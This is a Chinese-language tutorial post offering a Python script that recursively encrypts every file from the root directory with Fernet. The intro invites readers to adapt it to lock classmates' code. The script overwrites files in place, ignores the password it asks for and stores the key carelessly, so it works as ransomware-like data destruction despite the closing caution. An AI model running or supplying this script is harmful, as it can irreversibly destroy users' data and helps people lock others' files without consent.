有时候,我们需要加密文件,可又有点复杂
这个代码就可以帮助你解决这个问题
你也可以改造一下去锁同学的代码
话不多说,直接上代码
请先安装模块 cryptography
如果无法导入`cryptography`模块,可能是因为你没有安装它。你可以使用以下命令来安装`cryptography`模块:
pip install cryptography
请确保你已经安装了Python的包管理工具`pip`。如果你使用的是Python 3.4或更高版本,`pip`应该已经自动安装。如果你使用的是较旧的Python版本,你可能需要手动安装`pip`。如果您仍然无法导入`cryptography`模块,请确保您已经正确安装了它,并且在泥的Python环境中可用。如果没有出现任何错误,说明`cryptography`模块已经成功导入。如果仍然无法导入,请检查您的Python环境和安装是否正确。
#以下是一个示例的Python脚本,可以用于对整个硬盘进行加密,并允许用户自由输入密码:
import os
from cryptography.fernet import Fernet
# 生成加密密钥
def generate_key():
return Fernet.generate_key()
# 创建加密器
def create_cipher(key):
return Fernet(key)
# 加密文件
def encrypt_file(cipher, file_path):
with open(file_path, 'rb') as file:
data = file.read()
encrypted_data = cipher.encrypt(data)
with open(file_path, 'wb') as file:
file.write(encrypted_data)
# 解密文件
def decrypt_file(cipher, file_path):
with open(file_path, 'rb') as file:
encrypted_data = file.read()
decrypted_data = cipher.decrypt(encrypted_data)
with open(file_path, 'wb') as file:
file.write(decrypted_data)
# 递归加密目录下的所有文件
def encrypt_directory(cipher, directory):
for root, dirs, files in os.walk(directory):
for file in files:
file_path = os.path.join(root, file)
encrypt_file(cipher, file_path)
# 递归解密目录下的所有文件
def decrypt_directory(cipher, directory):
for root, dirs, files in os.walk(directory):
for file in files:
file_path = os.path.join(root, file)
decrypt_file(cipher, file_path)
# 加密整个硬盘
def encrypt_hard_drive(password):
key = Fernet.generate_key()
cipher = create_cipher(key)
encrypt_directory(cipher, '/')
with open('key.key', 'wb') as key_file:
key_file.write(key)
# 解密整个硬盘
def decrypt_hard_drive(password):
with open('key.key', 'rb') as key_file:
key = key_file.read()
cipher = create_cipher(key)
decrypt_directory(cipher, '/')
# 测试加密和解密
password = input("请输入密码:")
encrypt_hard_drive(password)
input("硬盘已加密,请按任意键继续解密...")
decrypt_hard_drive(password)
'''
请注意,这是一个非常强大和危险的脚本,可以对整个硬盘进行加密和解密。
在使用之前,请务必备份重要的数据,并确保您理解脚本的工作原理和潜在风险。
此外,加密和解密整个硬盘可能需要管理员权限,并且可能会影响系统的正常运行。请谨慎使用!
'''